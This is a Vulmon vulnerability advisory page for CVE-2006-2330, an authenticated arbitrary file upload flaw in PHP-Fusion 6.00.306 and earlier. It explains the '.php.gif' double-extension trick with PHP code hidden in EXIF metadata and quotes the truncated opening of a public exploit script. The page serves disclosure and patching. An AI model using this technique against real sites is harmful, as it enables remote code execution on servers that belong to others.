Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
6.4
CVSSv2

CVE-2006-2330

Published: 12/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
Subscribe to Php Fusion

Vulnerability Summary

PHP-Fusion 6.00.306 and previous versions, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.

Vulnerable Product Search on Vulmon Subscribe to Product

php fusion php fusion 6.00.110

php fusion php fusion 6.00.204

php fusion php fusion 6.00.107

php fusion php fusion 6.00.109

php fusion php fusion 6.00.206

php fusion php fusion 6.00.3

php fusion php fusion 6.00.303

php fusion php fusion 6.00.105

php fusion php fusion 6.00.106

php fusion php fusion 6.00.304

php fusion php fusion 6.00.306

Exploits

Exploit DB: PHP-Fusion 6.00.306 - Multiple Vulnerabilities
#!/usr/bin/php -q -d short_open_tag=on <? echo "PHPFusion <= v600306 avatar mod_mime arbitrary file upload &\r\n"; echo "local inclusion vulnerabilities\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; if ($argc<6) { echo "Usage: php "$argv[0]" host path user pass cmd OPTIONS\r\n"; ...

References

NVD-CWE-Otherhttp://www.php-fusion.co.uk/news.phphttp://www.securityfocus.com/bid/17898http://secunia.com/advisories/19992http://www.osvdb.org/25537http://securityreason.com/securityalert/873http://www.vupen.com/english/advisories/2006/1735https://exchange.xforce.ibmcloud.com/vulnerabilities/26388http://www.securityfocus.com/archive/1/433277/100/0/threadedhttps://nvd.nist.govhttps://www.exploit-db.com/exploits/1760/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
blind SQL injectionfirmwareCVE-2006-4304CVE-2024-32878CVE-2024-31502XSSCVE-2024-3059CVE-2024-33692CVE-2024-3400
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook